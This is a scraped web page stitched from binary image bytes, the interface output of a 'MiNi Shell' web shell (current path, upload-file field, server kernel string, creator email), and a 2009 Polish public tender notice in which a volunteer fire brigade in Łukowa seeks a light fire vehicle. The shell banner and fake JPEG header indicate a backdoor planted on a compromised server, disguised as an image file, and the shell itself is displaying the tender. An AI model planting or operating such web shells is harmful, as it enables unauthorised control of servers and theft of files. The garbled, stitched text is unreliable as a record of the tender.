JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090731/262536-N-2009.html

<p class="kh_header"><b>Nowa Sarzyna: Dostawa lekkiego samochodu pożarniczego</b><br>
<b>Numer ogłoszenia: 262536 - 2009; data zamieszczenia: 31.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicza Straż Pożarna w Łukowej , Łukowa, 37-310 Nowa Sarzyna, woj. podkarpackie, tel. 0-17 24 11 731.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> Zamawiający nie posiada strony internetowej</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa lekkiego samochodu pożarniczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego (rok produkcji 2008 lub 2009) lekkiego samochodu pożarniczego dla jednostki OSP w Łukowej.
Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych.
Pojazd powinien odpowiadać wymaganiom ustawy z dnia 20.06.1997 r. Prawo o ruchu drogowym (Dz. U. z 1997r. Nr 98, poz. 602 z póżn. zm.), spełniać wymagania Zamawiającego zawarte w SIWZ oraz /Wymagania dla samochodów ratowniczo-gaśniczych i samochodów ratownictwa technicznego przeznaczonych dla ochotniczych straży pożarnych, Józefów CNBOP - edycja druga - marzec 2006 r., a także /Wymagania ogólne i szczegółowe dla samochodów ratowniczo-gaśniczych KG PSP - CNBOP - czerwiec 2002 r./
z wyłączeniem elementów wyposażenia nie wchodzących w skład zamówienia. Pojazd powinien odpowiadać Polskiej Normie PN-EN 1846-1:2000 i PN-EN 1846-2:2002r. Wszystkie części, wszystkie elementy zamontowane na samochodzie oraz wyposażenie całego samochodu winne być zgodne z wymaganiami określonymi powyżej. Wykonawca będzie zobowiązany dostarczyć razem z przedmiotem zamówienia dokumentacje techniczno-ruchową (DTR). Powinna ona dotyczyć samochodu, wszystkich jego mechanizmów jak i wszystkich elementów stanowiących jego wyposażenie. 
Rodzaj pojazdu: Furgon: 
- Przeszklenie w części osobowej,
- Drzwi tylne dwuskrzydłowe, otwierające się o kat min.180stopni,
- Przystosowany do przewozu min 6 osób,
- Drzwi przedziału załogi umieszczone po obu stronach pojazdu,
- Przedział osobowy wyłożony tapicerką i podsufitką,
- Elektrycznie regulowane szyby boczne w kabinie kierowcy,
- Centralny, podwójnie ryglowany zamek z pilotem,
- Poduszka powietrzna dla kierowcy,
- Układy bezpieczeństwa: ABS, ESP.

Silnik
- z zapłonem samoczynnym z turbodoładowaniem spełniający normy Euro4,
- minimum 100 KM,
- napęd na oś tylną.

Oznakowanie
- Belka świetlna z napisem /STRAŻ/,
- Generator sygnałów świetlnych i dźwiękowych z możliwością podawania komunikatów słownych,
- Lampa błyskowa koloru niebieskiego z tyłu samochodu,
- Lampy przednie błyskowe stroboskopowe umieszczone na wysokości przednich lusterek samochodu osobowego,
- Tablice magnetyczne z napisem /STRAŻ/.

Zabudowa
- Oświetlenie przedziału pasażerskiego włączane z kabiny kierowcy i niezależnie z przedziału pasażerskiego,
- Oświetlenie przedziału ładunkowego włączane z kabiny kierowcy i niezależnie z przedziału pasażerskiego,
- Dodatkowe gniazdo zapalniczki w kabinie kierowcy,
- Przenośna lampa halogenowa (szperacz) zasilana z gniazda zapalniczki 12V,
- Konstrukcja przedziału dla załogi winna zapewniać ochronę pasażerów przed przemieszczającym się wyposażeniem podczas wypadku lub hamowania awaryjnego, poprzez oddzielenie przedziału sprzętowego od przedziału załogi, 
-  Możliwość dostępu z przedziału załogi do przedziału ładunkowego, 
- Podłoga przedziału załogi i ładunkowego  pokryta antypoślizgową blachą aluminiową,                   - Zabezpieczenie blachą aluminiową wewnętrznych części nadwozia, 
- Półki aluminiowe mocowane do stelaża ze stali nierdzewnej z miejscem na specjalistyczne wyposażenie pożarnicze.

Wyposażenie dodatkowe:
 
Agregat wysokociśnieniowy
- wydajność pompy min 40 l/min, przy ciśnieniu min 40 bar z płynną regulacją),
- silnik czterosuwowy,
- rozrusznik ręczny,
- linia szybkiego natarcia min. 40 mb ze zwijadłem ręcznym,
- prądownica pistoletowa, z regulacją strumienia od mgłowego do zwartego,
- zbiornik wody o pojemności 300 litrów.
 
Maszt oświetleniowy o łącznej mocy lamp  1000W (2 x 500W)
- Zamocowany na stałe na pojeździe,
- Wysokość masztu po rozłożeniu od poziomu dachu do reflektora nie mniej niż 1,5 m,
- Stopień ochrony reflektorów masztu minimum IP 55 ( wg PN-92/E-08106 ).

Podest dachowy 
- podest na dachu z mocowaniami na 2 węże ssawne i drabinę nasadkową.

Radiotelefon 
radiotelefon samochodowy o parametrach: częstotliwość VHF 136-174 MHz, moc 1 - 25 W, odstęp międzykanałowy 12,5 kHz dostosowany do użytkowania w sieci MSWiA, min. 128 kanałów, Wyświetlacz alfanumeryczny min. 14 znaków.
Obrotowy potencjometr siły głosu.

Gwarancja:
Minimum 2 lata bez limitu kilometrów,
Minimum 8 lat gwarancji na perforację korozyjną nadwozia.

Samochód nowy,  winien posiadać odpowiedni certyfikat lub pozytywną opinię wydaną przez CNBOP..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy.

Ocena spełniania wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu: 
1) Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu na podstawie art. 44 ustawy - wg. załącznika nr 2 do siwz.
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów na potwierdzenie uprawnienia do wykonania określonej działalności Wykonawca postępuje zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm).
3. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu można przedkładać w formie kserokopii potwierdzonych za zgodność z oryginałem przez wykonawcę.
4. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

Oferty wspólne:
1. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i zawarciu umowy. Do oferty należy załączyć oryginał pełnomocnictwa lub kopię poświadczoną za zgodność z oryginałem przez wykonawców. Pełnomocnictwo winno:
1) określać do jakiego postępowania ma zastosowanie,
2) wskazywać pełnomocnika oraz zakres jego umocowania,
3) zawierać nazwę z określeniem adresu i siedziby wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia.
2. Pełnomocnictwo musi zostać udzielone przez wszystkich wykonawców ubiegających się o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji wykonawców składających wspólną ofertę.
3. Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję, itp.
4. Oferta wspólna składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:
a) wszyscy konsorcjanci winni obligatoryjnie dołączyć do oferty dokumenty wymagane od wykonawców wymienione w pkt 1. ppkt. 2.
b) Pozostałe warunki mogą być spełnione łącznie przez wszystkich członków konsorcjum.
5. Oświadczenie określone w pkt. 1. ppkt.1 podpisuje prawidłowo umocowany pełnomocnik lub wszyscy uczestnicy konsorcjum/spółki cywilnej.
6. Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną.              7. Przed podpisaniem umowy Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum (list intencyjny), zawierającą co najmniej:
a) zobowiązanie do realizacji wspólnego przedsięwzięcia obejmującego swoim zakresem realizację przedmiotu zamówienia,
b) określenie zakresu działania poszczególnych stron umowy,
c) czas obowiązywania, który nie może być krótszy niż okres obejmujący realizację zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ochotnicza Straż Pożarna w Łukowej, 37-310 Nowa Sarzyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2009 godzina 10:00, miejsce: Dom Strażaka w Łukowej, 37-310 Nowa Sarzyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com